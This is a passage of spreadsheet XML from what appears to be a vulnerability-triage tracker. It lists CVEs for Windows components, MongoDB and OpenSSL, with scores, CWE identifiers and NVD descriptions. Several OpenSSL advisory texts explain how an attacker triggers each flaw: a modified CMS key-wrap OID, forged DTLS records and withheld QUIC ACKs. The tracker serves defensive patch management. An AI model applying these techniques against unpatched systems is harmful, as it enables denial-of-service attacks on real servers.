      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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3" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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4" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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8" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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9" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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1" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89099</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>A race condition in the document value layer of MongoDB Server can allow concurrent server threads to operate on the same internal memory without synchronization, leading to memory corruption. An authenticated user holding ordinary read-write privileges on a database may be able to trigger this condition over the normal client protocol, resulting in server termination and potential corruption of process memory with user-influenced content. Successful use of this issue may impact the confidentiality, integrity, and availability of the affected server process.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89099</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14457</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>Issue summary: In a server or client configuration with RFC7250 Raw Public Keys (RPKs)
enabled, and only the private key (with no associated certificate) configured locally,
a NULL pointer dereference may occur when the remote peer solicits raw public keys and
also sends the typically omitted "signature_algorithms_cert" TLS extension.
Impact summary: The impact is limited to a possible Denial of Service as a result of
an application abort, no data disclosure or remote command execution are possible.
CWE: CWE-476: NULL Pointer Dereference
Description: While a passing comment in sample code in the documentation suggests
that key-only RPK configurations are supported, the best-practice RPK configuration
is to always configure a corresponding certificate (possibly self-signed or
signed by any convenient CA).
When the private key is configured along with a matching certificate, the
"signature_algorithms_cert" extension is handled reliably even without the
fix, and peer clients or servers that don't support raw public keys may be
able to complete a TLS connection by pinning or verifying the corresponding
certificate or its public key.
Deployments that prefer to configure just a private key with no certificate
need to upgrade to an updated release as noted below.
FIPS impact: no
No FIPS modules are affected by this issue, as the SSL protocol implementation
is outside the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14457</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54874</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-405</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>Issue summary: Receiving a DTLS record for a future epoch while a handshake
is in progress causes OpenSSL to buffer far more memory than the record
itself requires.
Impact summary: A peer can use a small amount of network traffic to make an
OpenSSL DTLS endpoint retain a disproportionately large amount of memory,
which may lead to a Denial of Service.
CWE: CWE-405: Asymmetric Resource Consumption (Amplification)
Description: While a DTLS handshake is in progress, a peer may legitimately
have already moved on to the next epoch (for example, having sent its
ChangeCipherSpec and Finished messages) before the local endpoint has
processed the same transition, typically because of reordering on the
underlying UDP transport. OpenSSL buffers such early records so that they
can be processed once the local endpoint catches up.
Buffering a record currently retains the entire read buffer it arrived in,
which is sized to hold the largest possible DTLS record (around 16
kilobytes), rather than just the bytes that make up the record itself. Up
to 100 such records may be buffered per connection. As a result, a peer
that sends a stream of small forged records claiming to belong to the next
epoch can cause an OpenSSL DTLS endpoint to retain around 1.7 megabytes of
memory, despite sending only a small fraction of that amount of data over
the network.
An attacker therefore gains a memory amplification factor of around 1200,
and can multiply the effect across as many associations as it is able to
open, making this a remote memory exhaustion Denial of Service risk for
DTLS servers. Since the memory retained per connection remains bounded,
and any limit an application already places on the number of concurrent
associations also bounds the total exposure, this issue has been assessed
as Low severity.
FIPS impact: no
No FIPS modules are affected by this issue as the affected code is outside
the OpenSSL FIPS module boundary.
OpenSSL 4.0, 3.6, 3.5, 3.4, 3.0, 1.1.1 and 1.0.2 are vulnerable to this
issue.
OpenSSL 4.0 users should upgrade to OpenSSL 4.0.2.
OpenSSL 3.6 users should upgrade to OpenSSL 3.6.4.
OpenSSL 3.5 users should upgrade to OpenSSL 3.5.8.
OpenSSL 3.4 users should upgrade to OpenSSL 3.4.7.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.22.
Premium support customers only:
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1zi
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zr
This issue was reported on 18 May 2026 by Amazon Web Services.
The fix has been developed by Matt Caswell.
-- cut (non-publishing metadata for internal use) --
Reported by: Amazon Web Services
Fixed by: Matt Caswell</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54874</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63072</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMS decryption sizes the key-unwrap output buffer based
on querying the unwrapped key size, but the AES-WRAP-PAD unwrap primitive
can write and cleanse more bytes than that query reports, causing an 8-byte
out-of-bounds heap write.
Impact summary: An attacker who supplies a crafted CMS message can trigger a
deterministic 8-byte out-of-bounds heap write when the victim decrypts it
with CMS_decrypt(), corrupting the heap and typically resulting in a Denial
of Service.
CWE: CWE-787: Out-of-bounds Write
Description: The key-wrap OID is potentially attacker-controlled on the wire.
CMS unwrapping allows both id-aesNNN-wrap-pad and id-aesNNN-wrap ciphers.
An attacker can take a legitimate message and change a single OID byte to
select the padded variant while leaving the message otherwise valid. Since
the unwrap key is derived from the recipient's private operation (ECDH key
agreement or ML-KEM decapsulation), the RFC 5649 integrity check cannot
pass, and the decryption fails with integrity failure.
The write is a fixed-size (8-byte), fixed-value (zero) heap overflow
immediately past the allocation, requires no special configuration, and is
reachable from the public CMS_decrypt() function. The consequence is
a heap corruption leading to a Denial of Service. The fix in the CMS code
sizes the unwrap output buffer for the worst case so a failed unwrap cannot
write past the allocation.
FIPS impact: no
As the CMS code lives outside the FIPS module boundary, no FIPS
modules are affected by this CVE.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63072</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63075</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>Issue summary: When OpenSSL processes QUIC traffic from a peer that repeatedly
sends ack-eliciting packets while not acknowledging ACK-only responses, the
QUIC stack can retain ACK-only packet metadata for the lifetime of the
connection.
Impact summary: A remote peer that can complete a QUIC handshake can
cause connection-scoped memory growth which may lead to Denial of Service
through memory exhaustion, especially with sustained traffic or many concurrent
QUIC connections.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: When the OpenSSL QUIC stack sends an ACK-only packet,
there is no requirement by the QUIC protocol that the peer will acknowledge
that ACK-only packet (i.e. it is itself not ack-eliciting). However, the OpenSSL
implementation stores the metadata about the ACK frames regardless.
In and of itself that's ok, but if a malicious peer establishes a connection, and
then drives the connection such that ACK-only packets are forced from the 
OpenSSL implementation peer (i.e., by sending numerous PING frames),
and then withholding any subsequent acks for ack-eliciting data, like
legitimate data, said malicious peer can force inappropriate memory growth
on the OpenSSL peer, potentially leading to a Denial of Service.
The fix is to ensure that we account for the transmission of the ACK-only
packet in the packet histories high and low watermark without actually storing
the ACK-only packet metadata itself.
FIPS impact: no
The OpenSSL FIPS module is not affected as the QUIC code is
outside the FIPS module boundary.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63075</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63076</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
